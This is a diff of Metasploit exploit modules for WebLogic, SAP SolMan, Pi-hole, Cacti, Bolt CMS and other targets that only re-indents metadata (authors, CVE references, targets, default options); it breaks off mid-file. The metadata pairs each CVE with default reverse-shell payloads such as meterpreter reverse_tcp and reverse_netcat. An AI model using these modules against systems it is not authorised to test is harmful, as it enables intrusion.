--- a/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb
@@ -28,40 +28,37 @@ class MetasploitModule < Msf::Exploit::Remote
           execute arbitrary code.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-        [
+        'Author' => [
           'Quynh Le', # Vulnerability Discovery
           'Y4er', # PoC
           'Shelby Pace' # Metasploit Module
         ],
-        'References' =>
-          [
-            [ 'CVE', '2020-2883' ],
-            [ 'URL', 'https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild' ],
-          ],
+        'References' => [
+          [ 'CVE', '2020-2883' ],
+          [ 'URL', 'https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild' ],
+        ],
         'Platform' => %w[unix linux win],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Privileged' => false,
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Windows',
-              {
-                'Platform' => 'win',
-                'Arch' => [ ARCH_X86, ARCH_X64 ],
-                'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
-              }
-            ],
-            [
-              'Unix',
-              {
-                'Platform' => %w[unix linux],
-                'CmdStagerFlavor' => 'printf',
-                'Arch' => [ ARCH_X86, ARCH_X64 ],
-                'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
-              }
-            ],
+            'Windows',
+            {
+              'Platform' => 'win',
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
+            }
           ],
+          [
+            'Unix',
+            {
+              'Platform' => %w[unix linux],
+              'CmdStagerFlavor' => 'printf',
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
+          ],
+        ],
         'DisclosureDate' => '2020-04-30',
         'DefaultTarget' => 0
       )

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -25,41 +25,38 @@ class MetasploitModule < Msf::Exploit::Remote
           over the T3 protocol to vulnerable WebLogic servers.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-        [
+        'Author' => [
           'Jang', # Vuln Discovery
           'Y4er', # PoC
           'Shelby Pace' # Metasploit Module
         ],
-        'References' =>
-          [
-            [ 'CVE', '2020-2555' ],
-            [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
-            [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
-          ],
+        'References' => [
+          [ 'CVE', '2020-2555' ],
+          [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
+          [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
+        ],
         'Platform' => %w[unix linux win],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Privileged' => false,
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Windows',
-              {
-                'Platform' => 'win',
-                'Arch' => [ ARCH_X86, ARCH_X64 ],
-                'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
-              }
-            ],
-            [
-              'Unix',
-              {
-                'Platform' => %w[unix linux],
-                'CmdStagerFlavor' => 'printf',
-                'Arch' => [ ARCH_X86, ARCH_X64 ],
-                'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
-              }
-            ],
+            'Windows',
+            {
+              'Platform' => 'win',
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
+            }
           ],
+          [
+            'Unix',
+            {
+              'Platform' => %w[unix linux],
+              'CmdStagerFlavor' => 'printf',
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
+          ],
+        ],
         'DisclosureDate' => '2020-01-15',
         'DefaultTarget' => 0
       )

--- a/modules/exploits/multi/sap/cve_2020_6207_solman_rs.rb
+++ b/modules/exploits/multi/sap/cve_2020_6207_solman_rs.rb
@@ -16,13 +16,12 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'SAP Solution Manager remote unauthorized OS commands execution',
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability
-            'Pablo Artuso', # @lmkalg The researcher who originally found this vulnerability
-            'Dmitry Chastuhin', # @chipik The researcher who made first PoC
-            'Vladimir Ivanov' # @_generic_human_ This Metasploit module
-          ],
+        'Author' => [
+          'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability
+          'Pablo Artuso', # @lmkalg The researcher who originally found this vulnerability
+          'Dmitry Chastuhin', # @chipik The researcher who made first PoC
+          'Vladimir Ivanov' # @_generic_human_ This Metasploit module
+        ],
         'Description' => %q{
           This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of
           SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication
@@ -32,12 +31,11 @@ class MetasploitModule < Msf::Exploit::Remote
           Successful exploitation will allow unauthenticated remote attackers to get reverse shell from connected to the SolMan
           agent as the user under which it runs SMDAgent service, usually daaadm.
         },
-        'References' =>
-          [
-            ['CVE', '2020-6207'],
-            ['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],
-            ['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']
-          ],
+        'References' => [
+          ['CVE', '2020-6207'],
+          ['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],
+          ['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']
+        ],
         'Privileged' => false,
         'Targets' => [
           [

--- a/modules/exploits/multi/scada/inductive_ignition_rce.rb
+++ b/modules/exploits/multi/scada/inductive_ignition_rce.rb
@@ -25,48 +25,44 @@ class MetasploitModule < Msf::Exploit::Remote
           Radek Domanski).
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-        [
+        'Author' => [
           'Pedro Ribeiro <pedrib[at]gmail.com>',                    # Vulnerability discovery and Metasploit module
           'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro' # Vulnerability discovery and Metasploit module
         ],
-        'References' =>
-          [
-            [ 'URL', 'https://www.zerodayinitiative.com/blog/2020/6/10/a-trio-of-bugs-used-to-exploit-inductive-automation-at-pwn2own-miami'],
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/rce_me_v2/rce_me_v2.md'],
-            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Miami2020/rce_me_v2.md'],
-            [ 'CVE', '2020-10644'],
-            [ 'CVE', '2020-12004'],
-            [ 'ZDI', '20-685'],
-            [ 'ZDI', '20-686'],
-          ],
+        'References' => [
+          [ 'URL', 'https://www.zerodayinitiative.com/blog/2020/6/10/a-trio-of-bugs-used-to-exploit-inductive-automation-at-pwn2own-miami'],
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/rce_me_v2/rce_me_v2.md'],
+          [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Miami2020/rce_me_v2.md'],
+          [ 'CVE', '2020-10644'],
+          [ 'CVE', '2020-12004'],
+          [ 'ZDI', '20-685'],
+          [ 'ZDI', '20-686'],
+        ],
         'Privileged' => true,
         'Platform' => %w[unix win],
-        'DefaultOptions' =>
-          {
-            'WfsDelay' => 15
-          },
-        'Targets' =>
+        'DefaultOptions' => {
+          'WfsDelay' => 15
+        },
+        'Targets' => [
+          [ 'Automatic', {} ],
           [
-            [ 'Automatic', {} ],
-            [
-              'Windows',
-              {
-                'Platform' => 'win',
-                'DefaultOptions' =>
-                { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
-              },
-            ],
-            [
-              'Linux',
-              {
-                'Platform' => 'unix',
-                'Arch' => [ARCH_CMD],
-                'DefaultOptions' =>
-                { 'PAYLOAD' => 'cmd/unix/reverse_python' }
-              },
-            ]
+            'Windows',
+            {
+              'Platform' => 'win',
+              'DefaultOptions' =>
+              { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
+            },
           ],
+          [
+            'Linux',
+            {
+              'Platform' => 'unix',
+              'Arch' => [ARCH_CMD],
+              'DefaultOptions' =>
+              { 'PAYLOAD' => 'cmd/unix/reverse_python' }
+            },
+          ]
+        ],
         'DisclosureDate' => '2020-06-11',
         'DefaultTarget' => 0
       )

--- a/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
+++ b/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
@@ -34,8 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Cedric Owens', # Discovery
           'timwr' # Module
         ],
-        'Notes' =>
-        {
+        'Notes' => {
           'Stability' => [ CRASH_SAFE ],
           'Reliability' => [ REPEATABLE_SESSION ],
           'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]

--- a/modules/exploits/osx/browser/safari_in_operator_side_effect.rb
+++ b/modules/exploits/osx/browser/safari_in_operator_side_effect.rb
@@ -29,14 +29,13 @@ class MetasploitModule < Msf::Exploit::Remote
           as a user but without sandbox restrictions.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Yonghwi Jin <jinmoteam[at]gmail.com>', # pwn2own2020
-            'Jungwon Lim <setuid0[at]protonmail.com>', # pwn2own2020
-            'Insu Yun <insu[at]gatech.edu>', # pwn2own2020
-            'Taesoo Kim <taesoo[at]gatech.edu>', # pwn2own2020
-            'timwr' # metasploit integration
-          ],
+        'Author' => [
+          'Yonghwi Jin <jinmoteam[at]gmail.com>', # pwn2own2020
+          'Jungwon Lim <setuid0[at]protonmail.com>', # pwn2own2020
+          'Insu Yun <insu[at]gatech.edu>', # pwn2own2020
+          'Taesoo Kim <taesoo[at]gatech.edu>', # pwn2own2020
+          'timwr' # metasploit integration
+        ],
         'References' => [
           ['CVE', '2020-9801'],
           ['CVE', '2020-9850'],

--- a/modules/exploits/osx/local/cfprefsd_race_condition.rb
+++ b/modules/exploits/osx/local/cfprefsd_race_condition.rb
@@ -26,14 +26,13 @@ class MetasploitModule < Msf::Exploit::Local
           a user can then login as root with the `login root` command without a password.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Yonghwi Jin <jinmoteam[at]gmail.com>', # pwn2own2020
-            'Jungwon Lim <setuid0[at]protonmail.com>', # pwn2own2020
-            'Insu Yun <insu[at]gatech.edu>', # pwn2own2020
-            'Taesoo Kim <taesoo[at]gatech.edu>', # pwn2own2020
-            'timwr' # metasploit integration
-          ],
+        'Author' => [
+          'Yonghwi Jin <jinmoteam[at]gmail.com>', # pwn2own2020
+          'Jungwon Lim <setuid0[at]protonmail.com>', # pwn2own2020
+          'Insu Yun <insu[at]gatech.edu>', # pwn2own2020
+          'Taesoo Kim <taesoo[at]gatech.edu>', # pwn2own2020
+          'timwr' # metasploit integration
+        ],
         'References' => [
           ['CVE', '2020-9839'],
           ['URL', 'https://github.com/sslab-gatech/pwn2own2020'],

--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -28,33 +28,30 @@ class MetasploitModule < Msf::Exploit::Local
           Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Dhanesh Kizhakkinan', # discovery
-            'Rich Mirch', # edb module
-            'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
-            'grimm'
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Dhanesh Kizhakkinan', # discovery
+          'Rich Mirch', # edb module
+          'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
+          'grimm'
+        ],
         'Platform' => [ 'osx' ],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'Targets' => [[ 'Auto', {} ]],
         'Privileged' => true,
-        'References' =>
-          [
-            [ 'CVE', '2020-3950' ],
-            [ 'EDB', '48235' ],
-            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
-            [ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
-            [ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ]
-          ],
+        'References' => [
+          [ 'CVE', '2020-3950' ],
+          [ 'EDB', '48235' ],
+          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
+          [ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
+          [ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ]
+        ],
         'DisclosureDate' => '2020-03-17',
-        'DefaultOptions' =>
-          {
-            'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
-            'WfsDelay' => 15
-          }
+        'DefaultOptions' => {
+          'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
+          'WfsDelay' => 15
+        }
       )
     )
 

--- a/modules/exploits/unix/fileformat/metasploit_libnotify_cmd_injection.rb
+++ b/modules/exploits/unix/fileformat/metasploit_libnotify_cmd_injection.rb
@@ -20,25 +20,21 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'DisclosureDate' => '2020-03-04',
         'License' => GPL_LICENSE,
-        'Author' =>
-          [
-            'pasta <jaguinaga@faradaysec.com>' # Discovery and PoC
-          ],
-        'References' =>
-          [
-            [ 'CVE', '2020-7350' ],
-            [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ]
-          ],
+        'Author' => [
+          'pasta <jaguinaga@faradaysec.com>' # Discovery and PoC
+        ],
+        'References' => [
+          [ 'CVE', '2020-7350' ],
+          [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ]
+        ],
         'Platform' => 'unix',
         'Arch' => ARCH_CMD,
-        'Payload' =>
-          {
-            'DisableNops' => true
-          },
-        'DefaultOptions' =>
-          {
-            'PAYLOAD' => 'cmd/unix/reverse_python'
-          },
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_python'
+        },
         'Targets' => [[ 'Automatic', {}]],
         'Privileged' => false,
         'DefaultTarget' => 0

--- a/modules/exploits/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.rb
+++ b/modules/exploits/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.rb
@@ -25,19 +25,16 @@ class MetasploitModule < Msf::Exploit::Remote
           msfvenom -p android/<...> -x <crafted_file.apk>
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Justin Steven' # @justinsteven
-          ],
-        'References' =>
-          [
-            ['URL', 'https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md'],
-            ['CVE', '2020-7384'],
-          ],
-        'DefaultOptions' =>
-          {
-            'DisablePayloadHandler' => true
-          },
+        'Author' => [
+          'Justin Steven' # @justinsteven
+        ],
+        'References' => [
+          ['URL', 'https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md'],
+          ['CVE', '2020-7384'],
+        ],
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true
+        },
         'Arch' => ARCH_CMD,
         'Platform' => 'unix',
         'Payload' => {

--- a/modules/exploits/unix/http/cacti_filter_sqli_rce.rb
+++ b/modules/exploits/unix/http/cacti_filter_sqli_rce.rb
@@ -24,36 +24,31 @@ class MetasploitModule < Msf::Exploit::Remote
           After calling the payload, the value is reset.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Leonardo Paiva', # edb, RCE
-            'Mayfly277' # original github, M4yFly on twitter SQLi
-          ],
-        'References' =>
-          [
-            [ 'EDB', '49810' ],
-            [ 'URL', 'https://github.com/Cacti/cacti/issues/3622' ],
-            [ 'CVE', '2020-14295' ]
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Leonardo Paiva', # edb, RCE
+          'Mayfly277' # original github, M4yFly on twitter SQLi
+        ],
+        'References' => [
+          [ 'EDB', '49810' ],
+          [ 'URL', 'https://github.com/Cacti/cacti/issues/3622' ],
+          [ 'CVE', '2020-14295' ]
+        ],
         'Privileged' => false,
         'Platform' => ['php'],
         'Arch' => ARCH_PHP,
         'DefaultOptions' => { 'Payload' => 'php/meterpreter/reverse_tcp' },
-        'Payload' =>
-          {
-            'BadChars' => "\x22\x27" # " '
-          },
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'Side Effects' => [ CONFIG_CHANGES, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ]
-          },
-        'Targets' =>
-          [
-            [ 'Automatic Target', {}]
-          ],
+        'Payload' => {
+          'BadChars' => "\x22\x27" # " '
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Side Effects' => [ CONFIG_CHANGES, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
         'DisclosureDate' => '2020-06-17',
         'DefaultTarget' => 0
       )

--- a/modules/exploits/unix/http/pihole_blocklist_exec.rb
+++ b/modules/exploits/unix/http/pihole_blocklist_exec.rb
@@ -25,26 +25,23 @@ class MetasploitModule < Msf::Exploit::Remote
           our payload in teleporter.php with root privileges.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Nick Frichette' # original PoC, discovery
-          ],
-        'References' =>
-          [
-            ['EDB', '48443'],
-            ['EDB', '48442'],
-            ['URL', 'https://frichetten.com/blog/cve-2020-11108-pihole-rce/'],
-            ['URL', 'https://github.com/frichetten/CVE-2020-11108-PoC'],
-            ['CVE', '2020-11108']
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Nick Frichette' # original PoC, discovery
+        ],
+        'References' => [
+          ['EDB', '48443'],
+          ['EDB', '48442'],
+          ['URL', 'https://frichetten.com/blog/cve-2020-11108-pihole-rce/'],
+          ['URL', 'https://github.com/frichetten/CVE-2020-11108-PoC'],
+          ['CVE', '2020-11108']
+        ],
         'Platform' => ['php'],
         'Privileged' => true,
         'Arch' => ARCH_PHP,
-        'Targets' =>
-          [
-            [ 'Automatic Target', {}]
-          ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
         'DisclosureDate' => '2020-05-10',
         'DefaultTarget' => 0,
         'Notes' => {

--- a/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
+++ b/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
@@ -19,23 +19,20 @@ class MetasploitModule < Msf::Exploit::Remote
           in the $PATH due to exploitation constraints.  DHCP server is not required to be running.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'François Renaud-Philippon <nate@nate.red>' # original PoC, discovery
-          ],
-        'References' =>
-          [
-            ['URL', 'https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/'],
-            ['CVE', '2020-8816']
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'François Renaud-Philippon <nate@nate.red>' # original PoC, discovery
+        ],
+        'References' => [
+          ['URL', 'https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/'],
+          ['CVE', '2020-8816']
+        ],
         'Platform' => ['unix'],
         'Privileged' => false,
         'Arch' => ARCH_CMD,
-        'Targets' =>
-          [
-            [ 'Automatic Target', {}]
-          ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
         'DisclosureDate' => '2020-03-28',
         'DefaultTarget' => 0,
         'DefaultOptions' => {

--- a/modules/exploits/unix/http/pihole_whitelist_exec.rb
+++ b/modules/exploits/unix/http/pihole_whitelist_exec.rb
@@ -20,22 +20,19 @@ class MetasploitModule < Msf::Exploit::Remote
           a command to the domain that is run on the OS.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Denis Andzakovic' # original PoC, discovery
-          ],
-        'References' =>
-          [
-            ['URL', 'https://pulsesecurity.co.nz/advisories/pihole-v3.3-vulns']
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Denis Andzakovic' # original PoC, discovery
+        ],
+        'References' => [
+          ['URL', 'https://pulsesecurity.co.nz/advisories/pihole-v3.3-vulns']
+        ],
         'Platform' => ['linux'],
         'Privileged' => false,
         'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
-        'Targets' =>
-          [
-            [ 'Automatic Target', {}]
-          ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
         'DisclosureDate' => '2018-04-15',
         'DefaultTarget' => 0,
         'Notes' => {

--- a/modules/exploits/unix/http/zivif_ipcheck_exec.rb
+++ b/modules/exploits/unix/http/zivif_ipcheck_exec.rb
@@ -20,31 +20,27 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'Silas Cutler (p1nk)' ],
-        'References' =>
-          [
-            [ 'URL', 'https://seclists.org/fulldisclosure/2017/Dec/42' ],
-            [ 'CVE', '2017-171069' ]
-          ],
+        'References' => [
+          [ 'URL', 'https://seclists.org/fulldisclosure/2017/Dec/42' ],
+          [ 'CVE', '2017-171069' ]
+        ],
         'Platform' => 'unix',
-        'Targets' =>
-          [
-            [ 'Automatic Target', {}]
-          ],
-        'Payload' =>
-          {
-            'Space' => 1024,
-            'BadChars' => "\x00\x27",
-            'DisableNops' => true,
-            'Compat' =>
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'Payload' => {
+          'Space' => 1024,
+          'BadChars' => "\x00\x27",
+          'DisableNops' => true,
+          'Compat' =>
               {
                 'PayloadType' => 'cmd',
                 'RequiredCmd' => 'generic'
               }
-          },
-        'DefaultOptions' =>
-          {
-            'PAYLOAD' => 'cmd/unix/generic'
-          },
+        },
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/generic'
+        },
         'Privileged' => false,
         'DisclosureDate' => '2017-09-01',
         'DefaultTarget' => 0

--- a/modules/exploits/unix/ssh/arista_tacplus_shell.rb
+++ b/modules/exploits/unix/ssh/arista_tacplus_shell.rb
@@ -24,8 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => ['Chris Anders'],
-        'References' =>
-        [
+        'References' => [
           [ 'CVE', '2020-9015'],
           [ 'URL', 'http://www.securitybytes.me/posts/cve-2020-9015/'],
           [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9015' ],
@@ -34,8 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => ARCH_X86,
         'ConnectionType' => 'find',
         'DefaultTarget' => 0,
-        'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'Payload' => 'linux/x86/shell_reverse_tcp'
         },
         'DisclosureDate' => '2020-02-02',

--- a/modules/exploits/unix/webapp/bolt_authenticated_rce.rb
+++ b/modules/exploits/unix/webapp/bolt_authenticated_rce.rb
@@ -35,49 +35,46 @@ class MetasploitModule < Msf::Exploit::Remote
           successfully tested against Bolt CMS 3.7.0 running on CentOS 7.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Sivanesh Ashok', # Discovery
-            'r3m0t3nu11', # PoC
-            'Erik Wynter' # @wyntererik - Metasploit
-          ],
-        'References' =>
-          [
-            ['EDB', '48296'],
-            ['URL', 'https://github.com/bolt/bolt/releases/tag/3.7.1'] # Bolt CMS 3.7.1 release info mentioning this issue and the discovery by Sivanesh Ashok
-          ],
+        'Author' => [
+          'Sivanesh Ashok', # Discovery
+          'r3m0t3nu11', # PoC
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          ['EDB', '48296'],
+          ['URL', 'https://github.com/bolt/bolt/releases/tag/3.7.1'] # Bolt CMS 3.7.1 release info mentioning this issue and the discovery by Sivanesh Ashok
+        ],
         'Platform' => ['linux', 'unix'],
         'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Linux (x86)', {
-                'Arch' => ARCH_X86,
-                'Platform' => 'linux',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
-                }
+            'Linux (x86)', {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
               }
-            ],
-            [
-              'Linux (x64)', {
-                'Arch' => ARCH_X64,
-                'Platform' => 'linux',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
-                }
-              }
-            ],
-            [
-              'Linux (cmd)', {
-                'Arch' => ARCH_CMD,
-                'Platform' => 'unix',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'cmd/unix/reverse_netcat'
-                }
-              }
-            ]
+            }
           ],
+          [
+            'Linux (x64)', {
+              'Arch' => ARCH_X64,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux (cmd)', {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ]
+        ],
         'Privileged' => false,
         'DisclosureDate' => '2020-05-07', # this the date a patch was released, since the disclosure data is not known at this time
         'DefaultOptions' => {

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -33,18 +33,17 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Payload' => { 'BadChars' => "\x00" },
         'DisclosureDate' => '2020-09-28',
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Automatic (Linux Dropper)',
-              {
-                'Platform' => 'linux',
-                'Arch' => [ARCH_X86, ARCH_X64],
-                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
-                'Type' => :linux_dropper
-              }
-            ]
-          ],
+            'Automatic (Linux Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
         'Privileged' => false,
         'DefaultTarget' => 0
       )

--- a/modules/exploits/unix/webapp/opensis_chain_exec.rb
+++ b/modules/exploits/unix/webapp/opensis_chain_exec.rb
@@ -23,15 +23,14 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => 'EgiX',
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            ['URL', 'http://karmainsecurity.com/KIS-2020-06'],
-            ['URL', 'http://karmainsecurity.com/KIS-2020-07'],
-            ['URL', 'http://karmainsecurity.com/KIS-2020-08'],
-            ['CVE', '2020-13381'],
-            ['CVE', '2020-13382'],
-            ['CVE', '2020-13383']
-          ],
+        'References' => [
+          ['URL', 'http://karmainsecurity.com/KIS-2020-06'],
+          ['URL', 'http://karmainsecurity.com/KIS-2020-07'],
+          ['URL', 'http://karmainsecurity.com/KIS-2020-08'],
+          ['CVE', '2020-13381'],
+          ['CVE', '2020-13382'],
+          ['CVE', '2020-13383']
+        ],
         'Privileged' => false,
         'Platform' => ['php'],
         'Arch' => ARCH_PHP,

--- a/modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb
+++ b/modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb
@@ -35,27 +35,26 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Payload' => { 'BadChars' => "\x00" },
         'DisclosureDate' => '2020-04-28',
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Automatic (Linux Dropper)',
-              {
-                'Platform' => 'linux',
-                'Arch' => [ARCH_X86, ARCH_X64],
-                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
-                'Type' => :linux_dropper
-              }
-            ],
-            [
-              'Automatic (Unix In-Memory)',
-              {
-                'Platform' => 'unix',
-                'Arch' => ARCH_CMD,
-                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
-                'Type' => :unix_memory
-              }
-            ]
+            'Automatic (Linux Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
           ],
+          [
+            'Automatic (Unix In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
